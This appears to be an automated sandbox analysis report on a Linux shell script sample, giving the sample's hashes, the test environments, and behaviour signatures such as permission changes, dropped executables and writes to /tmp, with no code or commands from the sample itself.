Analysis
-
max time kernel
28s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240508-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
18/10/2024, 01:37
Static task
static1
Behavioral task
behavioral1
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
-
Size
10KB
-
MD5
c956e213cb8e0cd5b63267ab840c5dae
-
SHA1
c9c0189ae5a4b6a84cf8c69090e33e6cb8974836
-
SHA256
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d
-
SHA512
903a8b0408d84cff6c5404beab29ca6b31d19c2f9cca4fce2d34ad6a66e57f53b049639da591e42a4587431c4ed65408d48533fac69dc8d799d48e89680297bd
-
SSDEEP
192:VLdU4cGZNPeGN6Gi9oMIiOtU4cUZNXeGN6Gym:NdU4cz9oMIiMU4cPm
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97